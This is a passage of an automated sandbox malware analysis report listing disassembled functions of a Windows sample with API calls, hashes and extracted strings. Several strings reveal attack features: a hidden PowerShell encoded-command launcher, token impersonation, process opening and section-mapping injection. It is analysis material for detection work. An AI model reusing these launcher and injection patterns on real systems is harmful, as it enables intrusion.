                • Instruction Fuzzy Hash: 2961F862608FC481EA269F29A4113EAB7A0EFA5BD4F085215DF8917B65EF3DC14BC700
                Function 006731F4 Relevance: 8.9, APIs: 7, Instructions: 181stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: freemallocstrchr$rand
                • String ID:
                • API String ID: 1305919620-0
                • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                • Instruction ID: b37816b41801c4281175eb57c47ed9b6b93ee4c20e9b0afe91c745b2bdfa0cfe
                • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                • Instruction Fuzzy Hash: 5B613A62208FD481EA269F39A4013EAA392EF95BD4F088129DF8D17715EF3DC243D304
                Function 001A3570 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001A35BD
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001A35C8
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • free.LIBCMT ref: 001A36AF
                • free.LIBCMT ref: 001A36B7
                • free.LIBCMT ref: 001A36BF
                • free.LIBCMT ref: 001A36CB
                • free.LIBCMT ref: 001A36D8
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                • Instruction ID: abc562699c1c0602eaef7a062d5cb2216df987cc85915ee2cd16499f8642370d
                • Opcode Fuzzy Hash: 3866d312ddc7406d2c13ac3d10959d9d3de063b9a6b1dce899036bf231b32379
                • Instruction Fuzzy Hash: E941F326300791ABDB15DF27A9603AE6761FB6ABC0F444024EF6A47701EF38DA67C700
                Function 00664170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 006641BD
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 006641C8
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • free.LIBCMT ref: 006642AF
                • free.LIBCMT ref: 006642B7
                • free.LIBCMT ref: 006642BF
                • free.LIBCMT ref: 006642CB
                • free.LIBCMT ref: 006642D8
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                • Instruction ID: 2d4a88687e5d7507016a98631cb0bebce9c8d6f38e5837d614730d00a0240c0c
                • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                • Instruction Fuzzy Hash: 074134323047828BDB59DBA699607AB275AFB49BC0F604124EF1A47B05DF38DA62C704
                Function 0066F274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: htonl$freemalloc
                • String ID: zyxwvutsrqponmlk
                • API String ID: 1249573706-3884694604
                • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                • Instruction ID: 71bde60fd73a793298d6e4adf1f89da9c9d25217c6deb7eab5dc2c0ca77e50fb
                • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                • Instruction Fuzzy Hash: CC21373230078046DB94EBB6E56132D6AD3AB89BD0F04803CEE5E87B5BEE3CC5468344
                Function 00673FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32 ref: 00673FE7
                • GetProcAddress.KERNEL32 ref: 00673FF7
                • GetLastError.KERNEL32 ref: 006740BF
                  • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                  • Part of subcall function 0067D134: GetCurrentProcess.KERNEL32 ref: 0067D161
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                • String ID: NtMapViewOfSection$ntdll.dll
                • API String ID: 1006775078-3170647572
                • Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                • Instruction ID: 40f3ebebb26c67e1b7042a69d92add0a9986f91f53ff5cdcb4679804f439bff7
                • Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
                • Instruction Fuzzy Hash: 3B31EF32710B4482EB10DB22E45976A73A2F788BB4F048329EF6D07B95DF3DC4468B44
                Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
                Function 001BB630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: strtok$_getptd_time64malloc
                • String ID: eThreadpoolTimer
                • API String ID: 1522986614-2707337283
                • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                • Instruction ID: 6b6eb52b04a315c801423870f2c32a99ef6710bb137d619f24a896f26e01ed9d
                • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                • Instruction Fuzzy Hash: F921D6B2A14BD485DB10DF52E0886AD77A8F7A8FE4B16426AEF5A83B41CF74C441C780
                Function 001B13B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001B13D2
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • _snprintf.LIBCMT ref: 001B13F1
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                • remove.LIBCMT ref: 001B13FD
                • remove.LIBCMT ref: 001B1404
                Strings
                • uld not open process: %d (%u), xrefs: 001B13D7
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                • String ID: uld not open process: %d (%u)
                • API String ID: 2566950902-823969559
                • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                • Instruction ID: a95d3efaa90c2af15f19040f1059ad5b508e251585c17898fc7696caa37f8ee5
                • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                • Instruction Fuzzy Hash: 6DF08261604B90D9D604AB12B8113EAB364E7A8FD0F9D4535FF8917B1ADF3CC5518744
                Function 00671FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 00671FD2
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • _snprintf.LIBCMT ref: 00671FF1
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • remove.LIBCMT ref: 00671FFD
                • remove.LIBCMT ref: 00672004
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                • String ID: %s\%s
                • API String ID: 1896346573-4073750446
                • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                • Instruction ID: e0e2b8aff05c8fda56302a13f39a6380ebc104d91b613d64687b117b274513b1
                • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                • Instruction Fuzzy Hash: 10F0E925208740C6D350AB51B81036AB366E784FC0F588134BF8C5BB16CE38C5528748
                Function 001ADA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _snprintf.LIBCMT ref: 001ADB25
                  • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                  • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                  • Part of subcall function 001B6F38: _snprintf.LIBCMT ref: 001B70A5
                • _snprintf.LIBCMT ref: 001ADBBD
                  • Part of subcall function 001B2170: strchr.LIBCMT ref: 001B21D6
                  • Part of subcall function 001B2170: _snprintf.LIBCMT ref: 001B220C
                  • Part of subcall function 001B200C: strchr.LIBCMT ref: 001B2069
                  • Part of subcall function 001B200C: _snprintf.LIBCMT ref: 001B20B3
                • _snprintf.LIBCMT ref: 001ADBD4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                • API String ID: 199363273-1250630670
                • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                • Instruction ID: 8d1d6e67d711b555cd00468b91f0abeea9f9fc8cd94810074212e067c41a4b5e
                • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                • Instruction Fuzzy Hash: AD61BD36700B8596EB10DF62E8907EEB3A5F799B98F804126EE8E57B58DF78C505C700
                Function 006700F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                • Instruction ID: f2c5bbf88da8a699e662fc6f765ffd5b0472a53531a90afa3896da39091dbb55
                • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                • Instruction Fuzzy Hash: 1651E063B04A40D6EF40EB75D4412ED6362FB95B88F80D129EE0E2771AEF38D64AC744
                Function 001BFA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1640621425-0
                • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                • Instruction ID: 48bfcc009182e69847d8196810102ae09eb5fa0f863c87d3263119f74cd34897
                • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                • Instruction Fuzzy Hash: 1831062130074486DE2C9E63DE506AAB651F754FE4F18863CDE6A47B91EB78D8878340
                Function 0068062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1640621425-0
                • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                • Instruction ID: 5dfa00621e6b32b7e7e6c45174b9e572d81259c5b26a8d18c8109948671366af
                • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                • Instruction Fuzzy Hash: FC314E3230074047FFA8BE63555025EB653BB94FE0F188B249F6647B91E778D49A8744
                Function 001A48F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001A493A
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • malloc.LIBCMT ref: 001A4945
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                • free.LIBCMT ref: 001A4A2C
                • free.LIBCMT ref: 001A4A34
                • free.LIBCMT ref: 001A4A40
                • free.LIBCMT ref: 001A4A4D
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                • Instruction ID: ddfe11bee21fe91fe2ede919e1d28a075b0ed0327b27eca2dde5050658343c14
                • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                • Instruction Fuzzy Hash: EA31D0263147D587DF15DB2AA4107AE6B99FBE6BC8F0A8024DD568B711EF78C807C304
                Function 006654F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0066553A
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • malloc.LIBCMT ref: 00665545
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                • free.LIBCMT ref: 0066562C
                • free.LIBCMT ref: 00665634
                • free.LIBCMT ref: 00665640
                • free.LIBCMT ref: 0066564D
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                • Instruction ID: fa91a802676de7115477e7ecbe885dc73ce57f5083dfd6623bbf0d32d29fbd00
                • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                • Instruction Fuzzy Hash: 2E31F032304B8546EB16DB6A980176B6B5BF795BC8F898034DD5ACB722EE38C946C300
                Function 00672D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067322E
                  • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067324C
                  • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673264
                  • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673271
                  • Part of subcall function 006731F4: rand.LIBCMT ref: 0067333D
                • strchr.LIBCMT ref: 00672DD6
                • _snprintf.LIBCMT ref: 00672E0C
                  • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                  • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                • _snprintf.LIBCMT ref: 00672E23
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                • String ID: %s&%s$?%s
                • API String ID: 1095232423-1750478248
                • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                • Instruction ID: 1fe48212a70a43d23a9b5d68317c628ddc730258e810a59962683c7a904eb9b7
                • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                • Instruction Fuzzy Hash: 92419262204E8191EA119F2ED1552E8A3B2FF98B99F089526DF8D57B20EF34D1B2C340
                Function 0068AC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                • String ID:
                • API String ID: 2998201375-0
                • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                • Instruction ID: 0be63cf8f76dd2de07813188870e01f120d0accea70a650f284de5b6bec00889
                • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                • Instruction Fuzzy Hash: 8631A03220578086EB60AF55E580769BB66FB85FD0F188326EF8997F65DB38C881C701
                Function 001AF064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 001AF085
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • free.LIBCMT ref: 001AF0C0
                • fwrite.LIBCMT ref: 001AF101
                • fclose.LIBCMT ref: 001AF109
                • free.LIBCMT ref: 001AF116
                  • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$free$_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1696598829-0
                • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                • Instruction ID: 596a8a54152f7891fa982c53a1485843f2f04b7ac0077e255192b694276bbb64
                • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                • Instruction Fuzzy Hash: E4118265704B4081DE10F762E5513AE6392EBA5BE4F484239FE6E4BB8ADF3CC5068740
                Function 001C99EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 001C99FD
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C99F5
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                • Instruction ID: 85ea3803c73946272d53637bb4f04510df937969011ab4b487b9e71251e7dd7d
                • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                • Instruction Fuzzy Hash: 9CF0F672751A4484EF092B74C8967AC7251ABB6F32FA6830DD629073D2C77CC8618710
                Function 0068A5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0068A5FD
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 0068A5F5
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                • Instruction ID: 9a5633fb553444a0838e3de5a66e580a6212c88d0cbfca2ea863417caaa9e619
                • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                • Instruction Fuzzy Hash: 26F02BB270060445EF097FA4C8A136C72539F51B32FA98306D9390B3D5E77D44D38712
                Function 001B5228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                • strrchr.LIBCMT ref: 001B52ED
                • _snprintf.LIBCMT ref: 001B539B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintfmallocstrrchr
                • String ID: Failed to impersonate token: %d$t permissions in process: %d
                • API String ID: 3587327836-1492073275
                • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                • Instruction ID: 352770fe634819318cdb85f5b69be49ea66c76f3b606d11a1e4ac64c4e353384
                • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
                • Instruction Fuzzy Hash: 1B41B135704A8096DB14FB22B9147AF6792B79AFD4F488125EE5A4BB69DF3CC442C700
                Function 00672818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON
                Download Yara Rule
                APIs
                • CreatePipe.KERNEL32 ref: 006728A3
                • GetStartupInfoA.KERNEL32 ref: 006728AD
                • Sleep.KERNEL32 ref: 006728F4
                  • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 006748F1
                  • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 00674932
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
